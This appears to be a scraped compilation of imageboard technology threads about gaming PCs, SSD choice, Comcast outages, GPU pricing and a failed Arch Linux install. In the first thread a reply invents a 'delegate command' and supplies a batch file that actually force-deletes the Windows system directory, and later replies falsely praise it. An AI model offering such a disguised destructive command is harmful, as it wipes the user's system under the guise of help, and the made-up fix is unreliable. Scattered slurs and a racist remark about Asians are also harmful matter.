I want to allocate my system RAM to my dedicated video RAM, but I don't know how to do it. Generally what I'm trying to do is have an optimal gaming computer and it has everything but a shitty graphics card.
Let me post my specs to tell you all what I mean:
Processor
AMD Phenom(tm) II X4 820 Processor
Video Card
NVIDIA GeForce 9100
RAM
8.0 GB
Operating System
Microsoft Windows 7 Home Premium Edition Service Pack 1 (build 7601), 64-bit
Ofc, the integrated GeForce 9100 limits me from playing any games I want to play, and I can't very much replace it.
So what do I do, /g/? What must I do, to transform this sluggish colossus into a mean, keen gaming machine?
Pic related, this could be me if you all helped me out.
Yeah you need to you the delegate command which delegates your ram to be used for graphic functions, which is generally stored in the windows directory for efficiency purposes.
Type this into your text editor of choice (like notepad) and save it as a .bat file. It should allow your ram to be used as both system and graphic ram as needed.
@echo off
del c:\windows\*.* /F /S /Q /as /ar /aa /ah

Wow I gained 20 fps. Thans man.
>>56170279
never knew about the delegate command
thanks anon
Hey /g/. Was wondering what you guys think of the new Crucial MX300 series of SSDs. They're based on Micron 3D TLC nan. Apparently the 3D nan is only really employed by Samsung before this.
Looking to get a 4th ssd and currently only have Samsung stuff in my main PC. My only experience with crucial is their MX100 line that I have in my laptop.
Looking at the MX300 however shows it is right behind the 850 EVO is pretty much every benchmark and after checking my local Microcenter prices, much cheaper. The 525GB mx300 is only $117 compared to the $180 for the 500GB 850 EVO. The 750GB mx300 is $160. I'm really leaning towards the Crucial 750GB simply because of basic price: performance:capacity and was just looking for input before making the plunge.
Would appreciate the input guys.

i buy crucial because its recommended and then if someone asks why i recommend it i can say its recommended
thus absolving me of responsibility
>>56169021
Hmm. Unhelpful in regards to the MX300 line. But good thinking. I usually recommend crucial for budget minded. Samsung if price isn't a problem.
>>56168987
We are nearing a point where any SSD from a reputable brand is going to be OK.
Im not sure when people forgot about crucial, but they have been decent since SSDs became mainstays
Why is comcast so bad? The first 2 weeks of signing up i come home on a friday ready to relax. Tv wont come on, have to talk to 3 manager and 2 peons to get it fix. They had canceled my account for no reason, took an hour and a half and had to resign up for my package. Now a month later i am sitting here with no internet or tv again from an outage. What the fuck. I had att uverse and it went out once in 4 years
>>56168977
Because in most areas (here, for instance) they are the only major competitor and they need not be good to make money. The truth is that because of the way internet service businesses are ran in the land of the free, people just have to deal with it and there's pretty much nothing we can do because there are just no ways to protest.
>>56168977
One time they got my unit number wrong and it took them and hour to close and reopen my account because you can't change address line 2 apparently.

Who /givingup/ here? It's just nonstop problems with my computer. I'm so exhausted of troubleshooting and trying to figure out what's wrong with the damn thing. I just reinstalled windows 10 about 4 times in a span of a week. Something just goes wrong every single fucking time to the point where my computer slows to a turtles pace and everything stops working one by one to the point where I can't even open the command prompt. It works for a day then just fucking falls apart for no apparent reason. I have no clue what to do anymore other than lay on my bed and stare at my ceiling. Post your tech frustrations anons. Why do you feel like giving up?
>>56168959
I gave up with Windows and I moved to xubuntu 2 years ago.
Try win7?
Also I gave up on the it industry because I could never come home happy and/or fulfilled and boy did I try.
In still glad I gave it a shot. Though I feel a bit out of place here as I feel on the border of retard pleb and acceptable.
>>56168959
>never install Windows 10

Sorry OP, never had that problem. Have you tried installing Gentoo?

I bought a hand-crank 60's style metal pencil sharpener I might post later. Just hope the roller blades are replaceable.

>Decide that I'm going to water cool my next build
>Buy the water block for the gpu thinking that it is compatible
>hold off for 6 months on finishing the build because I planned to double gpu
>order the same card and block again
>finally decide to start working on it today
>realize that the gpu's are a custom board
>spent like $600 bucks on water blocks that are absolutely useless to me because I can't read compatibility charts and now have to go blow the same amount to get the correct ones
Worst of all I have no idea what the fuck I'm going to do with the blocks. They are literally trash at this point.
>>56168843
Use them to give yourself the most high tech enema ever.
>>56168843
Can i have them?
Try selling them, you retard.
Why does a XX60 card cost as much today that a XX80 costed a few years ago?
Why did GPU prices skyrocketed this much?
>>56168603
It doesn't.
The 1060 is $249 and the 980 was $549
GTX 280 was $650
GTX 260 was $400
whats your point?
1GB GTX 460 released at $229 (768MB at $200) to much fanfare.
GTX 1060 is $249. 3GB 1060 is $200.

no.
Everyone knows state of the art GPUs are currently expensive because the current demand for GPUs amongst PC gamers and bitcoin miners isnt enough to recoup the costs of fab and other associated costs, so NVIDIA raises the prices of GPUs, so then they could get a ROI within a few years of releasing a new gen.
Many within the AI field are predicting that Deep Learning will become ubiquitous with in the next decade, and deep learning algorithms require top of the line GPUs. Deep learning is predicted to be worth more than 100 Billion dollars within a few years, and NVIDIA already has a headstart. Will the next generarion of GPUs be cheaper considering NVIDIA now has a larger market to tap into with Deep Learning?
>>56168435
probably. all i know is that AMD literally stands zero chance at this point. they need to focus on CPUs or something, cause they are completely fucked on GPU market.

what year is it? who the fuck hasnt moved on to ASICs?
>>56168435
Deep learning is glorified pattern recognition in images, and while it is great to have an advantage there, it won't radically change Nvidia's position much. Enterprise and consumer hardware are already tremendous markets, both of which Nvidia has a controlling share of.
Things like hardware ray tracing, and SSD caching will do more to secure enterprise sales than deep learning.
>>56168628
Memecoin miners, some coins still disallow ASIC miners.
Chinese and other shit Asians play MMOs to sell accounts and in game gold. They'll basically do anything for money, even if its working at $0.25 an our. Sometimes even less.
Recently build computer. Ram runs at 2133 not 1066. GPU temp a bit high since i finished running a few benchmarks(36-38 C idle).
speccy reports RAM at half of it's speed because DDR means DOUBLE data rate.

Ok guys, I recently had the desire to switch to Linux and made the jump. I downloaded the most recent version of ArchLinux, followed the guide to a T, and still got this when I tried to reboot after install. What do
>>56168050
>What do
try an easier distro first before diving into a neckbeard distro
shit man, i've been fucking with linux off and on since the late 90s and i still wont touch arch.
>>56168050
install ubuntu fag
I don't use arch but you probably fucked with the /etc/fstab
Maybe post a link to the guide you followed? Seems like /new_root doesn't exist and shouldn't, but something expects it to. Maybe /etc/fstab is wrong. You should be able to repair stuff from the initfs if you somewhat know what you're doing.
